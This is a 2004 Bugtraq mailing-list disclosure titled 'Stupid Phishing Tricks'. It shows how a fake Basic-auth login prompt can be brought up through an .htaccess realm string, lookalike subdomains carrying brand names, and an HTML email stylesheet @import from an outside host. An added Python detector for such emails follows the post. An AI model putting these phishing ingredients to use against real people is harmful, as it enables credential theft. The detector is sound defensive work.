Message-ID: <200405211346.i4LDkl3W022607__12182.3571892039$1085154459@web125.megawebservers.com>
Date: Fri, 21 May 2004 13:46:47 -0000
From: "http-equiv@...ite.com" <1@...ware.com>
To: <bugtraq@...urityfocus.com>
Cc: <NTBugtraq@...tserv.ntbugtraq.com>
Subject: Stupid Phishing Tricks

Phriday, May 21, 2004

Several pheeble yet interesting phishing possibilities arise as
phollows:

Take one .htaccess trivially modified to suit the target
scenario:

AuthName "EXCHANGE SERVER LOGIN ERROR: PLEASE TRY AGAIN"
AuthType Basic

One throw-away domain which can include the target's host name:

http://www.hotmail.hackerguy.nickelandimehosting.com
http://www.evenlargerbank.money.nickelandimehosting.com
http://www.bloatedcorp.lackey.nickelandimehosting.com

A couple of ridiculous email contraptions:

<STYLE type=text/css>
@import url( http://www.malware.com/pheesh );
</STYLE>

1. Outlook Express

[screen shot: http://www.malware.com/phool.png 56KB]

2. Outlook 2003

[screen shot: http://www.malware.com/ohlook.png 39KB]

note: the above 'style sheet' works on outbound [reply to] [so
much for not downloading external content] inbound can be
achieved as well via http://securityfocus.com/bid/10369 which
has an even more convincing network login applet

3. Hotmail

[screen shot: http://www.malware.com/goturmail.png 91KB]

hint: hotmail [and other] web designer people; off-set the html
login form on the site as many prime banks have done.

The possibilities are obviously endless.

BE AWARE OF THE SHARKS OUT THERE

NB: anyone have any contact or connection to the upper
management security or abuse dept. of one public company called:
SAVVIS Communications. http://savvis.net/ it appears their abuse
dept. is woefully negligent in attending to abuse affairs.

End Call
--
http://www.malware.com
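
A mail-gateway check for the two ingredients the message above describes, as an added example that is not part of the original post: it lists remote stylesheet URLs an HTML mail part would fetch (the point at which a Basic-auth prompt can appear) and marks hosts where a watched name is only a subdomain label. The function names, the watch list and the sample message are constructed for illustration, and the "last two labels" rule is a simplifying assumption that misjudges suffixes such as co.uk.

```python
import email
import re
from email import policy
from urllib.parse import urlparse

# Constructed sample: the post's <STYLE> snippet pointed at one of its example hosts.
SAMPLE = b"""\
From: sender@example.test
To: user@example.test
Subject: constructed sample
MIME-Version: 1.0
Content-Type: text/html; charset=us-ascii

<html><head><STYLE type=text/css>
@import url( http://www.hotmail.hackerguy.nickelandimehosting.com/pheesh );
</STYLE></head><body>hello</body></html>
"""

# CSS "@import url(...)" / "@import '...'" and any <link href=...> (includes stylesheets).
IMPORT_RE = re.compile(r"""@import\s+(?:url\(\s*)?["']?\s*([^"')\s;]+)""", re.I)
LINK_RE = re.compile(r"""<link\b[^>]*\bhref\s*=\s*["']?([^"'\s>]+)""", re.I)

WATCHED = {"hotmail", "evenlargerbank", "bloatedcorp"}  # assumed watch list


def remote_style_refs(raw):
    """Return http(s) URLs that HTML parts of the message pull in as style/link."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    urls = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        html = part.get_content()
        for ref in IMPORT_RE.findall(html) + LINK_RE.findall(html):
            if urlparse(ref).scheme in ("http", "https"):
                urls.append(ref)
    return urls


def brand_outside_registered_domain(url, brands=WATCHED):
    """True if a watched name is a subdomain label rather than the registered domain.
    Assumption: registered domain = last two labels (no public suffix list)."""
    labels = (urlparse(url).hostname or "").lower().split(".")
    return any(label in brands for label in labels[:-2])


def scan(raw):
    """Pair each remote reference with the lookalike-host verdict."""
    return [(u, brand_outside_registered_domain(u)) for u in remote_style_refs(raw)]
```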